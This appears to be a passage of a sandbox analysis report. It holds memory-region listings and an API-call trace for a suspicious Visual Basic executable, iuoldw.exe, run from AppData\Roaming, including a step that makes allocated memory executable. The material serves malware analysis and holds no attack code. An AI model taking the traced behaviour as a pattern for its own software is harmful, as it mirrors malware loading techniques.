= "" Region: id = 1498 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1499 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1500 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1501 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1502 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1503 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1504 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1505 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1506 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1507 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1508 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1509 start_va = 0x340000 end_va = 0x346fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1510 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1511 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1512 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1513 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1514 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1515 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1516 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1517 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1518 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1519 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1520 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1521 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1522 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1523 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1524 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1525 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1526 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1527 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1528 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1529 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1530 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1531 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1532 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1533 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1534 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1535 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1536 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1537 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1538 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1539 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1540 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1541 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1542 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1543 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1544 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1545 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1546 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1547 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1548 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1549 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1550 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1551 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1552 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1553 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1554 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1555 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1556 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1557 start_va = 0x340000 end_va = 0x346fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1558 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1559 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1560 start_va = 0x340000 end_va = 0x346fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1561 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1562 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1563 start_va = 0x340000 end_va = 0x346fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1564 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1565 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1566 start_va = 0x340000 end_va = 0x346fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1567 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1568 start_va = 0x74850000 end_va = 0x74870fff entry_point = 0x74850000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1569 start_va = 0x76b10000 end_va = 0x76b54fff entry_point = 0x76b10000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1570 start_va = 0x330000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Thread: id = 106 os_tid = 0x8ec [0077.809] GetVersion () returned 0x1db10106 [0077.810] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x759f0000 [0077.810] GetProcAddress (hModule=0x759f0000, lpProcName="IsTNT") returned 0x0 [0077.811] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0x1eb0000 [0077.811] VirtualAlloc (lpAddress=0x1eb0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x1eb0000 [0077.812] GetCurrentThreadId () returned 0x8ec [0077.812] GetCommandLineA () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe " [0077.812] GetEnvironmentStringsW () returned 0x564990* [0077.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1486, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1486 [0077.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1486, lpMultiByteStr=0x1ea07d0, cbMultiByte=1486, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1486 [0077.812] FreeEnvironmentStringsW (penv=0x564990) returned 1 [0077.812] GetStartupInfoA (in: lpStartupInfo=0x18f9b8 | out: lpStartupInfo=0x18f9b8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0077.812] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0077.812] GetFileType (hFile=0x0) returned 0x0 [0077.812] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0077.812] GetFileType (hFile=0x0) returned 0x0 [0077.812] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0077.812] GetFileType (hFile=0x0) returned 0x0 [0077.812] SetHandleCount (uNumber=0x20) returned 0x20 [0077.813] GetACP () returned 0x4e4 [0077.813] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f9e0 | out: lpCPInfo=0x18f9e0) returned 1 [0077.813] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72a4c528, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\iuoldw.exe")) returned 0x2c [0077.814] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x759f0000 [0077.814] GetProcAddress (hModule=0x759f0000, lpProcName="IsProcessorFeaturePresent") returned 0x75a05235 [0077.814] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0077.814] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x7c [0077.814] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x80 [0077.814] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0077.815] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x72a4e6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0077.815] GetVersion () returned 0x1db10106 [0077.815] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0077.816] GetUserDefaultLCID () returned 0x409 [0077.816] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0077.817] GetSystemMetrics (nIndex=5) returned 1 [0077.817] GetSystemMetrics (nIndex=6) returned 1 [0077.817] GetSystemMetrics (nIndex=11) returned 32 [0077.817] GetSystemMetrics (nIndex=12) returned 32 [0077.817] GetSystemMetrics (nIndex=34) returned 132 [0077.817] GetSystemMetrics (nIndex=35) returned 38 [0077.817] GetSystemMetrics (nIndex=0) returned 1440 [0077.817] GetSystemMetrics (nIndex=1) returned 900 [0077.817] GetSystemMetrics (nIndex=32) returned 8 [0077.817] GetSystemMetrics (nIndex=33) returned 8 [0077.817] GetSystemMetrics (nIndex=42) returned 0 [0077.817] GetStockObject (i=15) returned 0x188000b [0077.817] GetStockObject (i=7) returned 0x1b00017 [0077.817] GetStockObject (i=6) returned 0x1b00018 [0077.817] GetStockObject (i=8) returned 0x1b00016 [0077.817] GetStockObject (i=4) returned 0x1900011 [0077.817] GetStockObject (i=2) returned 0x1900012 [0077.817] GetStockObject (i=0) returned 0x1900010 [0077.817] GetStockObject (i=5) returned 0x1900015 [0077.817] GetStockObject (i=13) returned 0x18a002e [0077.817] GetDC (hWnd=0x0) returned 0x390106ff [0077.818] GetTextExtentPointA (in: hdc=0x390106ff, lpString="0", c=1, lpsz=0x18f9dc | out: lpsz=0x18f9dc) returned 1 [0077.819] GetDeviceCaps (hdc=0x390106ff, index=14) returned 1 [0077.820] GetDeviceCaps (hdc=0x390106ff, index=12) returned 32 [0077.820] GetDeviceCaps (hdc=0x390106ff, index=88) returned 96 [0077.820] GetDeviceCaps (hdc=0x390106ff, index=90) returned 96 [0077.820] GetDeviceCaps (hdc=0x390106ff, index=38) returned 32409 [0077.820] ReleaseDC (hWnd=0x0, hDC=0x390106ff) returned 1 [0077.820] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e7d0 | out: ppMalloc=0x72a4e7d0*=0x755966bc) returned 0x0 [0077.820] GetCurrentThreadId () returned 0x8ec [0077.820] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0077.821] GetCurrentThreadId () returned 0x8ec [0077.821] GetCurrentThreadId () returned 0x8ec [0077.821] GetCommandLineA () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe " [0077.821] lstrlenA (lpString="") returned 0 [0077.821] lstrcpyA (in: lpString1=0x18feac, lpString2="" | out: lpString1="") returned="" [0077.821] SetErrorMode (uMode=0x8001) returned 0x8001 [0077.821] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x18fb68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0077.821] GetUserDefaultLCID () returned 0x409 [0077.821] lstrcpyA (in: lpString1=0x18f868, lpString2="*" | out: lpString1="*") returned="*" [0077.821] LoadStringA (in: hInstance=0x72940000, uID=0x7d1, lpBuffer=0x18fc6c, cchBufferMax=8 | out: lpBuffer="409") returned 0x3 [0077.821] GetSystemDefaultLCID () returned 0x409 [0077.821] GetUserDefaultLCID () returned 0x409 [0077.821] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x18fc76, cchData=2 | out: lpLCData=".") returned 2 [0077.821] GetStockObject (i=13) returned 0x18a002e [0077.821] GetObjectA (in: h=0x18a002e, c=60, pv=0x18fc3c | out: pv=0x18fc3c) returned 60 [0077.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x18fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0077.821] lstrcpyA (in: lpString1=0x18fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0077.821] lstrlenA (lpString="{xx}") returned 4 [0077.821] lstrlenA (lpString="VB98.CHM") returned 8 [0077.821] lstrcpyA (in: lpString1=0x72a4eae8, lpString2="VB98.CHM" | out: lpString1="VB98.CHM") returned="VB98.CHM" [0077.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x18fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0077.821] lstrcpyA (in: lpString1=0x18fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0077.821] lstrlenA (lpString="{xx}") returned 4 [0077.821] lstrlenA (lpString="VBENLR98.CHM") returned 12 [0077.821] lstrcpyA (in: lpString1=0x72a4ebf0, lpString2="VBENLR98.CHM" | out: lpString1="VBENLR98.CHM") returned="VBENLR98.CHM" [0077.821] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fd90, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\iuoldw.exe")) returned 0x2c [0077.821] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x18fc8c, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0077.821] lstrcpynA (in: lpString1=0x18fb70, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL", iMaxLength=260 | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0077.821] lstrlenA (lpString="C:\\Windows\\system32\\MSVBVM60.DLL") returned 32 [0077.822] lstrcpyA (in: lpString1=0x2317b0, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL" | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0077.822] LCMapStringA (in: Locale=0x409, dwMapFlags=0x200, lpSrcStr="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", cchSrc=-1, lpDestStr=0x18fb50, cchDest=260 | out: lpDestStr="C:\\USERS\\AETADZJZ\\APPDATA\\ROAMING\\IUOLDW.EXE") returned 45 [0077.823] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x18fc54, dwRevision=0x1 | out: pSecurityDescriptor=0x18fc54) returned 1 [0077.823] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x18fc54, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x18fc54) returned 1 [0077.823] CreateSemaphoreA (lpSemaphoreAttributes=0x18fc68, lInitialCount=0, lMaximumCount=2147483647, lpName="C:?USERS?AETADZJZ?APPDATA?ROAMING?IUOLDW.EXE") returned 0x90 [0077.823] GetLastError () returned 0x0 [0077.823] GetVersionExA (in: lpVersionInformation=0x18fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0077.824] OleInitialize (pvReserved=0x0) returned 0x0 [0077.980] OaBuildVersion () returned 0x321396 [0077.980] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x76b60000 [0077.980] GetLastError () returned 0x0 [0077.980] GetProcAddress (hModule=0x76b60000, lpProcName="OleLoadPictureEx") returned 0x76bc70a1 [0077.981] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc14a [0077.981] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0af [0077.981] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBFocusRT6", lpWndClass=0x18fc34 | out: lpWndClass=0x18fc34) returned 0 [0077.981] RegisterClassA (lpWndClass=0x18fc34) returned 0xc196 [0077.981] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBBubbleRT6", lpWndClass=0x18fc34 | out: lpWndClass=0x18fc34) returned 0 [0077.981] RegisterClassA (lpWndClass=0x18fc34) returned 0xc197 [0077.981] GetUserDefaultLCID () returned 0x409 [0077.982] GetSystemInfo (in: lpSystemInfo=0x18fbf4 | out: lpSystemInfo=0x18fbf4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0077.982] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x210000 [0077.983] VirtualAlloc (lpAddress=0x210000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0077.983] VirtualAlloc (lpAddress=0x210000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0077.983] VirtualAlloc (lpAddress=0x210000, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0077.983] VirtualAlloc (lpAddress=0x210000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0077.983] VirtualAlloc (lpAddress=0x210000, dwSize=0x5000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0077.983] VirtualAlloc (lpAddress=0x210000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0077.983] VirtualProtect (in: lpAddress=0x210000, dwSize=0x6000, flNewProtect=0x20, lpflOldProtect=0x18fc50 | out: lpflOldProtect=0x18fc50*=0x4) returned 1 [0077.984] GetCurrentProcess () returned 0xffffffff [0077.984] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x210000, dwSize=0x6000) returned 1 [0077.984] GlobalAddAtomA (lpString="VBDisabled") returned 0xc110 [0077.984] GetVersion () returned 0x1db10106 [0077.984] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76b60000 [0077.984] GetProcAddress (hModule=0x76b60000, lpProcName="DispCallFunc") returned 0x76b73dcf [0077.984] GetProcAddress (hModule=0x76b60000, lpProcName="LoadTypeLibEx") returned 0x76b707b7 [0077.984] GetProcAddress (hModule=0x76b60000, lpProcName="UnRegisterTypeLib") returned 0x76b91ca9 [0077.984] GetProcAddress (hModule=0x76b60000, lpProcName="CreateTypeLib2") returned 0x76b78e70 [0077.984] GetProcAddress (hModule=0x76b60000, lpProcName="VarDateFromUdate") returned 0x76b77684 [0077.984] GetProcAddress (hModule=0x76b60000, lpProcName="VarUdateFromDate") returned 0x76b7cc98 [0077.984] GetProcAddress (hModule=0x76b60000, lpProcName="GetAltMonthNames") returned 0x76ba903a [0077.985] GetProcAddress (hModule=0x76b60000, lpProcName="VarNumFromParseNum") returned 0x76b76231 [0077.985] GetProcAddress (hModule=0x76b60000, lpProcName="VarParseNumFromStr") returned 0x76b75fea [0077.985] GetProcAddress (hModule=0x76b60000, lpProcName="VarDecFromR4") returned 0x76b83f94 [0077.985] GetProcAddress (hModule=0x76b60000, lpProcName="VarDecFromR8") returned 0x76b84e9e [0077.985] GetProcAddress (hModule=0x76b60000, lpProcName="VarDecFromDate") returned 0x76badb72 [0077.985] GetProcAddress (hModule=0x76b60000, lpProcName="VarDecFromI4") returned 0x76b92a8c [0077.985] GetProcAddress (hModule=0x76b60000, lpProcName="VarDecFromCy") returned 0x76bad737 [0077.985] GetProcAddress (hModule=0x76b60000, lpProcName="VarR4FromDec") returned 0x76bae015 [0077.985] GetProcAddress (hModule=0x76b60000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x76bacc3d [0077.985] GetProcAddress (hModule=0x76b60000, lpProcName="GetRecordInfoFromGuids") returned 0x76bad1c4 [0077.985] GetProcAddress (hModule=0x76b60000, lpProcName="SafeArrayGetRecordInfo") returned 0x76bad48c [0077.985] GetProcAddress (hModule=0x76b60000, lpProcName="SafeArraySetRecordInfo") returned 0x76bad4c6 [0077.986] GetProcAddress (hModule=0x76b60000, lpProcName="SafeArrayGetIID") returned 0x76bad509 [0077.986] GetProcAddress (hModule=0x76b60000, lpProcName="SafeArraySetIID") returned 0x76b7e7bb [0077.986] GetProcAddress (hModule=0x76b60000, lpProcName="SafeArrayCopyData") returned 0x76b7e496 [0077.986] GetProcAddress (hModule=0x76b60000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x76b7ddf1 [0077.986] GetProcAddress (hModule=0x76b60000, lpProcName="SafeArrayCreateEx") returned 0x76bad53f [0077.986] GetProcAddress (hModule=0x76b60000, lpProcName="VarFormat") returned 0x76bb2055 [0077.986] GetProcAddress (hModule=0x76b60000, lpProcName="VarFormatDateTime") returned 0x76bb20ea [0077.986] GetProcAddress (hModule=0x76b60000, lpProcName="VarFormatNumber") returned 0x76bb2151 [0077.986] GetProcAddress (hModule=0x76b60000, lpProcName="VarFormatPercent") returned 0x76bb21f5 [0077.986] GetProcAddress (hModule=0x76b60000, lpProcName="VarFormatCurrency") returned 0x76bb2288 [0077.986] GetProcAddress (hModule=0x76b60000, lpProcName="VarWeekdayName") returned 0x76bb2335 [0077.986] GetProcAddress (hModule=0x76b60000, lpProcName="VarMonthName") returned 0x76bb23d5 [0077.986] GetProcAddress (hModule=0x76b60000, lpProcName="VarAdd") returned 0x76b85934 [0077.986] GetProcAddress (hModule=0x76b60000, lpProcName="VarAnd") returned 0x76b85a98 [0077.986] GetProcAddress (hModule=0x76b60000, lpProcName="VarCat") returned 0x76b859b4 [0077.987] GetProcAddress (hModule=0x76b60000, lpProcName="VarDiv") returned 0x76bde405 [0077.987] GetProcAddress (hModule=0x76b60000, lpProcName="VarEqv") returned 0x76bdef07 [0077.987] GetProcAddress (hModule=0x76b60000, lpProcName="VarIdiv") returned 0x76bdf00a [0077.987] GetProcAddress (hModule=0x76b60000, lpProcName="VarImp") returned 0x76bdef47 [0077.987] GetProcAddress (hModule=0x76b60000, lpProcName="VarMod") returned 0x76bdf15e [0077.987] GetProcAddress (hModule=0x76b60000, lpProcName="VarMul") returned 0x76bddbd4 [0077.987] GetProcAddress (hModule=0x76b60000, lpProcName="VarOr") returned 0x76bdecfa [0077.987] GetProcAddress (hModule=0x76b60000, lpProcName="VarPow") returned 0x76bdea66 [0077.987] GetProcAddress (hModule=0x76b60000, lpProcName="VarSub") returned 0x76bdd332 [0077.987] GetProcAddress (hModule=0x76b60000, lpProcName="VarXor") returned 0x76bdee2e [0077.987] GetProcAddress (hModule=0x76b60000, lpProcName="VarAbs") returned 0x76bdca11 [0077.987] GetProcAddress (hModule=0x76b60000, lpProcName="VarFix") returned 0x76bdcc5f [0077.987] GetProcAddress (hModule=0x76b60000, lpProcName="VarInt") returned 0x76bdcde7 [0077.987] GetProcAddress (hModule=0x76b60000, lpProcName="VarNeg") returned 0x76bdc802 [0077.987] GetProcAddress (hModule=0x76b60000, lpProcName="VarNot") returned 0x76bdec66 [0077.987] 